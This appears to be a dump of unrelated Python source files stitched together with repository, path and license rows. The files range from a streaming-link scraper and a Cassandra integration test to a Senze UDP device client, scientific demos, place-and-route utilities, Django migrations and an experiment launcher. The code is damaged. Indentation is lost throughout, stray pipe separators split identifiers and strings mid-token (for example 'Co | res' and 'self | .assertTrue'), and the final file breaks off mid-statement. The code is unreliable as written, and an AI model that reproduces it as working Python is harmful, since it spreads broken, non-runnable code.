elif 'url' in location:
if 'http' in location['url']:
continue
url = urlparse.urljoin(self.cdn_link, location['url'])
response = client.request(url)
manifest = json.loads(response)
for video in manifest:
try:
quality = video['label']
link = video['file']
sources.append({
'source': 'CDN',
'quality | ': quality,
'language': 'en',
'url': link,
'direct': True,
'debridonly': False
})
| except Exception:
continue
return sources
except Exception:
return
def resolve(self, url):
try:
return url
except Exception:
return
def __get_episode_urls(self, data):
try:
search = self.search_path % data['imdb']
url = urlparse.urljoin(self.base_link, search)
response = client.request(url)
jsobj = json.loads(response)
for obj in jsobj['suggestions']:
if data['season'] in obj['value']:
url = urlparse.urljoin(self.base_link, obj['data']['href'])
response = client.request(url)
urls = re.findall('embedUrl="([^<]*?)">s%02de%02d<' % (int(data['season']), int(data['episode'])), response)
return urls
except Exception:
return
def __get_movie_urls(self, data):
try:
search = self.search_path % data['imdb']
url = urlparse.urljoin(self.base_link, search)
response = client.request(url)
jsobj = json.loads(response)
path = jsobj['suggestions'][0]['data']['href']
url = urlparse.urljoin(self.base_link, path)
response = client.request(url)
urls = re.findall('embedUrl="(.+?)">', response)
return urls
except Exception:
return
def __bytes_to_key(self, password, salt, output=48):
try:
seed = hashlib.md5(password + salt).digest()
key = seed
while len(key) < output:
seed = hashlib.md5(seed + (password + salt)).digest()
key += seed
return key[:output]
except Exception:
return
def __decrypt(self, encrypted):
try:
encrypted = base64.b64decode(encrypted)
salt = encrypted[8:16]
key_iv = self.__bytes_to_key(self.password, salt)
key = key_iv[:32]
iv = key_iv[32:]
decrypter = pyaes.Decrypter(pyaes.AESModeOfOperationCBC(key, iv = iv))
plaintext = decrypter.feed(encrypted[16:])
plaintext += decrypter.feed()
return plaintext
except Exception:
return |
WPMedia/dd-agent | tests/checks/integration/test_cassandra.py | Python | bsd-3-clause | 2,080 | 0.000481 | # stdlib
import threading
import time
from types import ListType
import unittest
# 3p
from nose.plugins.attrib import attr
# project
from aggregator import MetricsAggregator
from dogstatsd import Server
from jmxfetch import JMXFetch
from tests.checks.common import Fixtures
STATSD_PORT = 8121
class DummyReporter(threading.Thread):
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
self.finished = threading.Event()
self.metrics_aggregator = metrics_aggregator
self.interval = 10
self.metrics = None
self.finished = False
self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='cassandra')
class JMXTestCase(unittest.TestCase):
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = Fixtures.directory()
self.jmx_daemon = JMXFetch(confd_path, {'dogstatsd_port': STATSD_PORT})
self.t2 = threading.Thread(target=self.jmx_daemon.run)
self.t2.start()
def tearDown(self):
self.server.stop()
self.reporter.finished = True
self.jmx_daemon.terminate()
def testCustomJMXMetric(self):
count = 0
while self.reporter.metrics is None:
time.sleep(1)
count += 1
if count > 25:
raise Exception("No metrics were received in 25 seconds")
metrics = self.reporter.metrics
self.assertTrue(isinstance(metrics, ListType))
self.assertTrue(len(metrics) > 0)
self | .assertTrue(len([t for t in metrics if "cassandra.db." in t['metric'] and "instance:cassandra_instance" in t[ | 'tags']]) > 40, metrics)
|
kasundezoysa/senze | testpi/myDevice.py | Python | apache-2.0 | 4,355 | 0.027325 | #!/usr/bin/env python
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
from twisted.internet.protocol import DatagramProtocol
from twisted.internet import reactor
import datetime
import socket
import time
import sys
import os.path
lib_path = os.path.abspath('../utils')
sys.path.append(lib_path)
from myParser import *
from myCrypto import *
#from myDriver import *
#from myCamDriver import *
import re
import hashlib
#from PIL import Image
#host='connect.mysensors.info'
host='localhost'
port=9090
state="INITIAL"
device=""
server="mysensors"
class mySensorDatagramProtocol(DatagramProtocol):
def __init__(self, host,port,reactor):
| self.ip= socket.gethostbyname(host)
self.port = port
#self._reactor=reactor
#self.ip=reactor.resolve(host)
def startProtocol(self):
| self.transport.connect(self.ip,self.port)
if state=='INITIAL':
#If system is at the initial state, it will send the device creation Senze
self.register()
else:
response=raw_input("Enter your Senze:")
self.sendDatagram(response)
def stopProtocol(self):
#on disconnect
#self._reactor.listenUDP(0, self)
print "STOP **************"
def register(self):
global server
cry=myCrypto(name=device)
senze ='SHARE #pubkey %s @%s' %(pubkey,server)
senze=cry.signSENZE(senze)
self.transport.write(senze)
def sendDatagram(self,senze):
global server
cry=myCrypto(name=device)
senze=cry.signSENZE(senze)
print senze
self.transport.write(senze)
def datagramReceived(self, datagram, host):
print 'Datagram received: ', repr(datagram)
parser=myParser(datagram)
recipients=parser.getUsers()
sender=parser.getSender()
signature=parser.getSignature()
data=parser.getData()
sensors=parser.getSensors()
cmd=parser.getCmd()
if cmd=="DATA":
if 'UserCreated' in data['msg']:
#Creating the .devicename file and store the device name and PIN
f=open(".devicename",'w')
f.write(device+'\n')
f.close()
print device+ " was created at the server."
print "You should execute the program again."
print "The system halted!"
reactor.stop()
elif 'UserCreationFailed' in data['msg']:
print "This user name may be already taken"
print "You can try it again with different username"
print "The system halted!"
reactor.stop()
#self.sendDatagram()
def init():
#cam=myCamDriver()
global device
global pubkey
global state
#If .device name is not there, we will read the device name from keyboard
#else we will get it from .devicename file
try:
if not os.path.isfile(".devicename"):
device=raw_input("Enter the device name: ")
# Account need to be created at the server
state='INITIAL'
else:
#The device name will be read form the .devicename file
f=open(".devicename","r")
device = f.readline().rstrip("\n")
state='READY'
except:
print "ERRER: Cannot access the device name file."
raise SystemExit
#Here we will generate public and private keys for the device
#These keys will be used to perform authentication and key exchange
try:
cry=myCrypto(name=device)
#If keys are not available yet
if not os.path.isfile(cry.pubKeyLoc):
# Generate or loads an RSA keypair with an exponent of 65537 in PEM format
# Private key and public key was saved in the .devicenamePriveKey and .devicenamePubKey files
cry.generateRSA(bits=1024)
pubkey=cry.loadRSAPubKey()
except:
print "ERRER: Cannot genereate private/public keys for the device."
raise SystemExit
print pubkey
#Check the network connectivity.
#check_connectivity(ServerName)
def main():
global host
global port
protocol = mySensorDatagramProtocol(host,port,reactor)
reactor.listenUDP(0, protocol)
reactor.run()
if __name__ == '__main__':
init()
main()
|
crate/crate-docs-theme | src/crate/theme/rtd/conf/sql_99.py | Python | apache-2.0 | 1,537 | 0 | # -*- coding: utf-8; -*-
#
# Licensed to Crate (https://crate.io) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. Crate licenses
# this file to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may
# obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless requ | ire | d by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# However, if you have executed another commercial license agreement
# with Crate these terms will supersede the license and you may use the
# software solely pursuant to the terms of the relevant commercial agreement.
from crate.theme.rtd.conf import *
# If you update the `project` value here, you must update it in the
# `src/crate/theme/rtd/crate/sidebartoc.html` file or else Sphinx will not
# expand the sidebar TOC for this project.
project = u"SQL 99"
html_title = project
url_path = "docs/sql-99"
# For sitemap extension
html_baseurl = "https://crate.io/%s/" % url_path
# For rel="canonical" links
html_theme_options.update(
{
"canonical_url_path": "%s/en/latest/" % url_path,
}
)
ogp_site_url = html_baseurl
|
blechta/dolfin-tape | dolfintape/demo_problems/StokesVortices.py | Python | gpl-3.0 | 2,060 | 0.000971 | # Copyright (C) 2015 Jan Blechta
#
# This file is part of dolfin-tape.
#
# dolfin-tape is free | software: you can | redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# dolfin-tape is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with dolfin-tape. If not, see <http://www.gnu.org/licenses/>.
from dolfin import *
from dolfintape.demo_problems.GeneralizedStokes import GeneralizedStokesProblem
from dolfintape.demo_problems.exact_solutions import pStokes_vortices
__all__ = ['StokesVortices']
class NewtonianFluid(object):
def __init__(self, mu):
self._mu = mu
def r(self):
return 2
def mu(self):
return self._mu
def g(self):
return lambda s, d, eps: Constant(1.0/(2.0*self._mu))*s - d
class StokesVortices(GeneralizedStokesProblem):
n = 4 # Number of vortices
mu = 1.0
def __init__(self, N):
mesh = UnitSquareMesh(N, N, "crossed")
constitutive_law = NewtonianFluid(self.mu)
# FIXME: Those expressions need domain but it causes integration domain
# confusion in spatial adaptivity
self.u_ex, self.p_ex, self.s_ex, self.f = \
pStokes_vortices(n=self.n, mu=self.mu, r=2, eps=0.0,
degree=6, domain=mesh)
GeneralizedStokesProblem.__init__(self, mesh, constitutive_law,
self.f, 0.0)
def bcs(self, W):
bc_u = DirichletBC(W.sub(0), (0.0, 0.0), "on_boundary")
bc_p = DirichletBC(W.sub(1), 0.0, "near(x[0], 0.0) && near(x[1], 0.0)",
method="pointwise")
return [bc_u, bc_p]
|
project-rig/rig | rig/place_and_route/utils.py | Python | gpl-2.0 | 13,067 | 0.000077 | """Utilities functions which assist in the generation of commonly required data
structures from the products of placement, allocation and routing.
"""
from collections import defaultdict
from six import iteritems, itervalues
import warnings
from rig.place_and_route.machine import Machine, Co | res, SDRAM, SRAM
from rig.place_and_route.constraints import ReserveResourceConstraint
from rig.machine_control.consts import AppState
def build_machine(system_info,
core_resource=Cores,
sdram_resource=SDRAM,
sram_resource=SRAM):
"""Build a :py:class:`~rig.place_and_route.Machine` object from a
:py:class:`~rig.machine_control.machine_controller.SystemInfo` object.
.. note::
| Links are tested by sending a 'PEEK' command down the link which
checks to see if the remote device responds correctly. If the link
is dead, no response will be received and the link will be assumed
dead. Since peripherals do not generally respond to 'PEEK'
commands, working links attached to peripherals will also be marked
as dead.
.. note::
The returned object does not report how much memory is free, nor
how many cores are idle but rather the total number of working cores
and the size of the heap. See :py:func:`.build_resource_constraints`
for a function which can generate a set of
:py:class:`~rig.place_and_route.constraints` which prevent the use of
already in-use cores and memory.
.. note::
This method replaces the deprecated
:py:meth:`rig.machine_control.MachineController.get_machine` method.
Its functionality may be recreated using
:py:meth:`rig.machine_control.MachineController.get_system_info` along
with this function like so::
>> sys_info = mc.get_system_info()
>> machine = build_machine(sys_info)
Parameters
----------
system_info : :py:class:`rig.machine_control.machine_controller.SystemInfo`
The resource availability information for a SpiNNaker machine,
typically produced by
:py:meth:`rig.machine_control.MachineController.get_system_info`.
core_resource : resource (default: :py:class:`rig.place_and_route.Cores`)
The resource type to use to represent the number of working cores on a
chip, including the monitor, those already in use and all idle cores.
sdram_resource : resource (default: :py:class:`rig.place_and_route.SDRAM`)
The resource type to use to represent SDRAM on a chip. This resource
will be set to the number of bytes in the largest free block in the
SDRAM heap. This gives a conservative estimate of the amount of free
SDRAM on the chip which will be an underestimate in the presence of
memory fragmentation.
sram_resource : resource (default: :py:class:`rig.place_and_route.SRAM`)
The resource type to use to represent SRAM (a.k.a. system RAM) on a
chip. This resource will be set to the number of bytes in the largest
free block in the SRAM heap. This gives a conservative estimate of the
amount of free SRAM on the chip which will be an underestimate in the
presence of memory fragmentation.
Returns
-------
:py:class:`rig.place_and_route.Machine`
A :py:class:`~rig.place_and_route.Machine` object representing the
resources available within a SpiNNaker machine in the form used by the
place-and-route infrastructure.
"""
try:
max_cores = max(c.num_cores for c in itervalues(system_info))
except ValueError:
max_cores = 0
try:
max_sdram = max(c.largest_free_sdram_block
for c in itervalues(system_info))
except ValueError:
max_sdram = 0
try:
max_sram = max(c.largest_free_sram_block
for c in itervalues(system_info))
except ValueError:
max_sram = 0
return Machine(width=system_info.width,
height=system_info.height,
chip_resources={
core_resource: max_cores,
sdram_resource: max_sdram,
sram_resource: max_sram,
},
chip_resource_exceptions={
chip: {
core_resource: info.num_cores,
sdram_resource: info.largest_free_sdram_block,
sram_resource: info.largest_free_sram_block,
}
for chip, info in iteritems(system_info)
if (info.num_cores != max_cores or
info.largest_free_sdram_block != max_sdram or
info.largest_free_sram_block != max_sram)
},
dead_chips=set(system_info.dead_chips()),
dead_links=set(system_info.dead_links()))
def _get_minimal_core_reservations(core_resource, cores, chip=None):
"""Yield a minimal set of
:py:class:`~rig.place_and_route.constraints.ReserveResourceConstraint`
objects which reserve the specified set of cores.
Parameters
----------
core_resource : resource type
The type of resource representing cores.
cores : [int, ...]
The core numbers to reserve *in ascending order*.
chip : None or (x, y)
Which chip the constraints should be applied to or None for a global
constraint.
Yields
------
:py:class:`~rig.place_and_route.constraints.ReserveResourceConstraint`
"""
reservation = None
# Cores is in ascending order
for core in cores:
if reservation is None:
reservation = slice(core, core + 1)
elif reservation.stop == core:
reservation = slice(reservation.start, core + 1)
else:
yield ReserveResourceConstraint(
core_resource, reservation, chip)
reservation = slice(core, core + 1)
if reservation is not None:
yield ReserveResourceConstraint(core_resource, reservation, chip)
def build_core_constraints(system_info, core_resource=Cores):
"""Return a set of place-and-route
:py:class:`~rig.place_and_route.constraints.ReserveResourceConstraint`
which reserve any cores that that are already in use.
The returned list of
:py:class:`~rig.place_and_route.constraints.ReserveResourceConstraint`\ s
reserves all cores not in an Idle state (i.e. not a monitor and not already
running an application).
.. note::
Historically, every application was required to add a
:py:class:~rig.place_and_route.constraints.ReserveResourceConstraint to
reserve the monitor processor on each chip. This method improves upon
this approach by automatically generating constraints which reserve not
just the monitor core but also any other cores which are already in
use.
Parameters
----------
system_info : :py:class:`rig.machine_control.machine_controller.SystemInfo`
The resource availability information for a SpiNNaker machine,
typically produced by
:py:meth:`rig.machine_control.MachineController.get_system_info`.
core_resource : resource (Default: :py:data:`~rig.place_and_route.Cores`)
The resource identifier used for cores.
Returns
-------
[:py:class:`rig.place_and_route.constraints.ReserveResourceConstraint`, \
...]
A set of place-and-route constraints which reserves all non-idle cores.
The resource type given in the ``core_resource`` argument will be
reserved accordingly.
"""
constraints = []
# Find the set of cores which are universally reserved
globally_reserved = None
for chip_info in itervalues(system_info):
reserved = sum(1 << c for c, state in enumerate(chip_info.core_states)
if state != AppState.idle)
if globally_reserved is None:
globally_reserved = reserved
else:
g |
code-for-india/sahana_shelter_worldbank | modules/s3db/climate.py | Python | mit | 27,377 | 0.009972 | # -*- coding: utf-8 -*-
""" Sahana Eden Climate Model
@copyright: 2011-2013 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ["S3ClimateModel",
"climate_first_run",
]
from gluon import *
from gluon.storage import Storage
from ..s3 import *
# =============================================================================
class S3ClimateModel(S3Model):
"""
Climate data is stored in dynamically created tables.
These tables can be added from the command line script add_table.py
in modules.ClimateDataPortal.
The table definitions are stored in climate_sample_table_spec.
A data is an observed value over a time quantum at a given place.
e.g. observed temperature in Kathmandu between Feb 2006 - April 2007
Places are currently points, i.e. lat/lon coordinates.
Places may be stations.
Places may have elevation or other optional information.
@ToDo: i18n
@ToDo: Deprecate raw SQL (Tested only on PostgreSQL)
"""
names = ["climate_place",
"climate_place_elevation",
"climate_place_station_name",
"climate_place_station_id",
"climate_sample_table_spec",
"climate_monthly_aggregation",
"climate_station_parameter",
"climate_prices",
"climate_purchase",
"climate_save_query",
]
def model(self):
T = current.T
db = current.db
auth = current.auth
NONE = current.messages["NONE"]
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# | ---------------------------------------------------------------------
# Climate Place
#
# This resource is spread over 4 tables, which | we assume are linked by
# common IDs
#
# @ToDo: Migrate to gis_location?
# Although this table has many fields unused so a performance hit?
# elevation is not included as it would just mean a performance hit
# when we are generating 2D maps without elevation info.
define_table("climate_place",
Field("longitude", "double",
notnull=True,
required=True,
),
Field("latitude", "double",
notnull=True,
required=True,
)
)
# ---------------------------------------------------------------------
# elevation may not be useful for future projects
# e.g. where not available, or sea-based stations
# also, elevation may be supplied for gridded data
define_table("climate_place_elevation",
Field("elevation_metres", "double",
notnull=True,
required=True,
),
)
# ---------------------------------------------------------------------
# not all places are stations with elevations
# as in the case of "gridded" data
# a station can only be in one place
define_table("climate_place_station_name",
Field("name", "double",
notnull=True,
required=True,
),
)
station_id = S3ReusableField("station_id", "reference %s" % tablename,
sortby="name",
requires = IS_ONE_OF(db,
"climate_place_station_name.id",
climate_station_represent,
orderby="climate_place_station_name.name",
sort=True
),
represent = climate_station_represent,
label = "Station",
ondelete = "RESTRICT"
)
# ---------------------------------------------------------------------
# station id may not be useful or even meaningful
# e.g. gridded data has no stations.
# this is passive data so ok to store separately
define_table("climate_place_station_id",
Field("station_id", "integer",
notnull=True,
required=True,
),
)
# ---------------------------------------------------------------------
# coefficient of variance is meaningless for degrees C but Ok for Kelvin
# internally all scales must be ratio scales if coefficient
# of variations is to be allowed, (which it is)
# rainfall (mm), temp (K) are ok
# output units
define_table("climate_sample_table_spec",
Field("name",
notnull=True,
required=True,
),
Field("sample_type_code",
length = 1,
notnull = True,
# web2py requires a default value for not null fields
default = "",
required = True
),
Field("field_type",
notnull=True,
required=True,
),
Field("units",
notnull=True,
required=True,
),
Field("date_mapping",
default="",
notnull=True,
required=True
),
Field("grid_size", "double",
default = 0,
notnull = True,
required = True
)
)
parameter_id = S3ReusableField("parameter_id", "reference %s" % tablename,
sortby="name",
requires = IS_ONE_OF(db,
"climate_sample_table_spec.id",
sample_table_spec_represent,
sort=True
),
represent = sample_table_spec_represent,
label = "Parameter",
ondelete = "RESTRICT"
)
# -------- |
rancher/rancher | tests/validation/tests/rke/test_install_config.py | Python | apache-2.0 | 4,984 | 0 | from .conftest import * # NOQA
from .common import * # NOQA
def test_install_config_1(test_name, cloud_provider, rke_client, kubectl):
"""
Node Address specified as just IP and using only this in the node spec
Specific kubernetes_version can be used
"""
rke_template = 'cluster_install_config_11.yml.j2'
nodes = cloud_provider.create_multiple_nodes(3, test_name)
create_and_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True)
def test_install_config_2(test_name, cloud_provider, rke_client, kubectl):
"""
Node Address specified as FQDN and using only this in the node spec
"""
rke_template = 'cluster_install_config_2.yml.j2'
nodes = cloud_provider.create_multiple_nodes(3, test_name)
create_and_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True)
def test_install_config_3(test_name, cloud_provider, rke_client, kubectl):
"""
Hostname override specified as a non resolvable name
"""
rke_template = 'cluster_install_config_3.yml.j2'
nodes = cloud_provider.create_multiple_nodes(3, test_name)
# set node_name to non-resolvable name for hostname_override
index = 0
for node in nodes:
node.node_name = "{0}-{1}".format(test_name, index)
index += 1
create_and_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True)
def test_install_config_4(test_name, cloud_provider, rke_client, kubectl):
"""
Hostname override specified as a resolvable name
"""
rke_template = 'cluster_install_config_4.yml.j2'
nodes = cloud_provider.create_multiple_nodes(3, test_name)
# set node_name to the resolvable host_name for hostname_override
for node in nodes:
node.node_name = node.host_name
create_and_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True)
def test_install_config_5(test_name, cloud_provider, rke_client, kubectl):
"""
Internal address provided
"""
rke_template = 'cluster_install_config_5.yml.j2'
nodes = cloud_provider.create_multiple_nodes(3, test_name)
create_and_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True, etcd_private_ip=True)
def test_install_config_6(test_name, cloud_provider, rke_client, kubectl):
"""
Providing address, hostname override(resolvable) and internal address
"""
rke_template = 'cluster_install_config_6.yml.j2'
nodes = cloud_provider.create_multiple_nodes(3, test_name)
# set node_name to the resolvable host_name for hostname_override
for node in nodes:
node.node_name = node.host_name
create_and_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True, etcd_private_ip=True)
def test_install_config_7(test_name, cloud_provider, rke_client, kubectl):
"""
Providing address, hostname override(non-resolvable) and internal address
"""
rke_template = 'cluster_install_config_7.yml.j2'
nodes = cloud_provider.create_multiple_nodes(3, test_name)
# set node_name to non-resolvable name for hostname_override
index = 0
for node in nodes:
node.node_name = "{0}-{1}".format(test_name, index)
index += 1
create_and_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True, etcd_private_ip=True)
def test_install_config_8(test_name, cloud_provider, rke_client, kubectl):
"" | "
Create a cluster with minimum possible values, will use the defaulted
network plugin for RKE
"""
rke_template = 'cluster_install_config_8.yml.j2'
nodes = cloud_provider.create_multiple_nodes(3, test_name)
create_a | nd_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True)
def test_install_config_9(test_name, cloud_provider, rke_client, kubectl):
"""
Launch a cluster with unencrypted ssh keys
"""
key_name = 'install-config-9'
rke_template = 'cluster_install_config_9.yml.j2'
public_key = cloud_provider.generate_ssh_key(key_name)
cloud_provider.import_ssh_key(key_name + '.pub', public_key)
nodes = cloud_provider.create_multiple_nodes(
3, test_name, key_name=key_name + '.pub')
create_and_validate(
cloud_provider, rke_client, kubectl, rke_template, nodes,
remove_nodes=True)
# def test_install_config_10(test_name, cloud_provider, rke_client, kubectl):
# """
# Launch a cluster with encrypted ssh keys
# """
# rke_template = 'cluster_install_config_10.yml.j2'
# nodes = cloud_provider.create_multiple_nodes(3, test_name)
# create_rke_cluster(rke_client, kubectl, nodes, rke_template)
# validate_rke_cluster(rke_client, kubectl, nodes)
# for node in nodes:
# cloud_provider.delete_node(node)
|
hzlf/openbroadcast.org | website/apps/massimporter/migrations/0001_initial.py | Python | gpl-3.0 | 4,610 | 0.000434 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django_extensions.db.fields
import django.db.models.deletion
from django.conf import settings
import uuid
class Migration(migrations.Migration):
dependencies = [
("importer", "0001_initial"),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name="Massimport",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"created",
django_extensions.db.fields.CreationDateTimeField(
auto_now_add=True
),
),
(
"updated",
django_extensions.db.fields.ModificationDateTimeField(
auto_now=True
),
),
(
"status",
models.PositiveIntegerField(
default=0,
choices=[
(0, "Init"),
(1, "Done"),
(2, "Queued"),
(99, "Error"),
],
),
),
("directory", models.CharField(max_length=1024)),
("uuid", models.UUIDField(default=uuid.uuid4)),
(
"collection_name",
models.CharField(max_length=250, null=True, blank=True),
),
(
"user",
models.ForeignKey(
on_delete=django.db.models.deletion.SET_NULL,
| blank=True,
to=settings.AUTH_USER_MODEL,
null=True,
),
),
],
options={
"ordering": ("-created",),
"verbose_name": "Import",
"verbose_name_plural": "Imports",
| "permissions": (("massimport_manage", "Manage Massimporter Sessions"),),
},
),
migrations.CreateModel(
name="MassimportFile",
fields=[
(
"id",
models.AutoField(
verbose_name="ID",
serialize=False,
auto_created=True,
primary_key=True,
),
),
(
"created",
django_extensions.db.fields.CreationDateTimeField(
auto_now_add=True
),
),
(
"updated",
django_extensions.db.fields.ModificationDateTimeField(
auto_now=True
),
),
(
"status",
models.PositiveIntegerField(
default=0,
db_index=True,
choices=[
(0, "Init"),
(1, "Done"),
(2, "Ready"),
(3, "Working"),
(4, "Warning"),
(5, "Duplicate"),
(6, "Queued"),
(7, "Importing"),
(99, "Error"),
(11, "Other"),
],
),
),
("path", models.CharField(max_length=1024)),
("uuid", models.UUIDField(default=uuid.uuid4)),
("import_file", models.ForeignKey(to="importer.ImportFile", null=True)),
(
"massimport",
models.ForeignKey(
related_name="files", to="massimporter.Massimport"
),
),
],
options={
"ordering": ("-created",),
"verbose_name": "File",
"verbose_name_plural": "Files",
},
),
]
|
rhyswhitley/savanna_iav | src/data_preproc/pickleit/pickle_inputs.py | Python | cc0-1.0 | 2,001 | 0.004998 | #!/usr/bin/env python
import os
import re
import netCDF4 as nc
import numpy as np
import pandas as pd
import pickle
def get_value(nc_o | bj, label):
return nc_obj.variables[label][:].flatten()
def get_dataframe(nc_path):
"""
A quick function to transform a netcdf file into a pandas dataframe that
| can be used for analysis and plotting. Attributes are extracted using
in built netCDF4 library functions. Time is arbitrary and needs to be
set by the user.
"""
print("> pickling contents in object at {0}".format(nc_path))
# make a connection to the netCDF file
ncdf_con = nc.Dataset(nc_path, 'r', format="NETCDF4")
# number of rows, equivalent to time-steps
time_len = len(ncdf_con.dimensions['time'])
# extract time information
time_sec = ncdf_con.variables['time']
sec_orig = re.search(r'\d+.*', str(time_sec.units)).group(0)
# the header values for each measurements; excludes time and space components
nc_allkeys = ncdf_con.variables.keys()
# only want time-varying inputs
data_values = [key for key in nc_allkeys \
if re.search("^((?!x|y|time|latitude|longitude).)*$", key)]
# create a new dataframe from the netCDF file
nc_dataframe = pd.DataFrame({label: get_value(ncdf_con, label) \
for label in data_values}, \
index=pd.date_range(sec_orig, \
periods=time_len, freq="30min"))
return nc_dataframe
def main():
# Retrieve dataframes of tree and grass productivity from ncdf files
input_df = get_dataframe(DIRPATH)
# pickle the leaf scale outputs (see if it's quicker to load)
pickle.dump(input_df, open(PKLPATH+"hourly/tower_inputs.pkl", "wb"))
return None
if __name__ == '__main__':
DIRPATH = os.path.expanduser("~/Savanna/Data/HowardSprings_IAV/ncdf/spa_hws_inputs.nc")
PKLPATH = os.path.expanduser("~/Savanna/Data/HowardSprings_IAV/pickled/")
main()
|
kgjamieson/NEXT-psych | examples/cartoon_tuple_n25k8/experiment_tuple_n25k8.py | Python | apache-2.0 | 4,671 | 0.004282 | """
author: Lalit Jain, lalitkumarjj@gmail.com
modified: Chris Fernandez, chris2fernandez@gmail.com
last updated: 05/27/2015
A module for replicating the 25 total arms with 8 arms shown at a time tuple bandits pure exploration
experiments from the NEXT paper.
Usage:
python experiment_tuple_n25k8.py
"""
import os, sys
# The line below imports launch_experiment.py.
# We assume that it is located in next/examples
# This function is used at the very bottom of this file
sys.path.append("../")
from launch_experiment import *
# List of Algorithms currently available for TupleBandits
curr_dir = os.path.dirname(os.path.abspath(__file__))
experiment_list = []
supported_alg_ids = ['RandomSampling']
# Algorithm List. These algorithms are independent (no inter-connectedness
# between algorithms) and each algorithm gets `proportion` number of queries
# (i.e., if proportions is set to 0.33 for each algorithm, each algorithm will
# sample 1/3 of the time)
alg_list = []
for alg_id in supported_alg_ids:
alg_item = {}
alg_item['alg_id'] = alg_id
alg_item['alg_label'] = alg_id
alg_item['params'] = {}
alg_list.append(alg_item)
# Run algorithms here in fixed proportions
# The number of queries sampled is the ones we specify, rather than using some
# more complicated scheme.
algorithm_management_settings = {}
params = {}
params['proportions'] = []
for algorithm in alg_list:
params['proportions'].append( { 'alg_label': algorithm['alg_label'] , 'proportion':1./len(alg_list) } )
# Algorithms are run here in fixed proportions
algorithm_management_settings['mode'] = 'fixed_proportions'
algorithm_management_settings['params'] = params
# Select some cartoons from the curr_dir
cap_list = ['cap436']
# Create experiment dictionary
for cap in cap_list:
initExp = {}
initExp['args'] = {}
# if cap == cap_list[2]:
# initExp['args']['n'] = 25
# else:
# initExp['args']['n'] = 8
initExp['args']['n'] = 25 # number of targets
initExp['args']['k'] = 8 # how many choices does the user have to choose among?
# probability of error. similar to "significant because p < 0.05"
initExp['args']['failure_probability'] = .01
# one parcipant sees many algorithms? 'one_to_many' means one participant
# will see many algorithms
initExp['args']['participant_to_algorithm_management'] = 'one_to_many'
initExp['args']['algorithm_management_settings'] = algorithm_management_settings
initExp['args']['alg_list'] = alg_list
# What does the user see at start and finish? These are the
# instructions/debreif (by default they have default values)
# initExp['args']['instructions'] = ''
# initExp['args']['debrief'] =''
initExp['args']['num_tries'] = 1 # how many questions does the user see?
# Which app are we running? (examples of other algorithms are in examples/
# (this is another TupleBandits example)
initExp['app_id'] = 'TupleBanditsPureExploration'
# Set the context
experiment = {}
experiment['initExp'] = initExp
experiment['primary_type'] = 'text'
experiment['primary_target_file'] = curr_dir+"/"+cap+".txt"
experiment['target_file'] = curr_dir+"/"+cap+".txt"
experiment['context'] = curr_dir+"/"+cap+".jpg"
experiment['context_type'] = 'image'
experiment_list.append(experiment)
# Launch the experiment
try:
AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']
AWS_ACCESS_ID = os.environ['AWS_ACCESS_KEY_ID']
AWS_BUCKET_NAME = os.environ['AWS_BUCKET_NAME']
host = os.environ['NEXT_BACKEND_GLOBAL_HOST'] + \
":" + os.environ.get('NEXT_BACKEND_GLOBAL_PORT', '8000')
except:
print 'The following environment variables must be defined:'
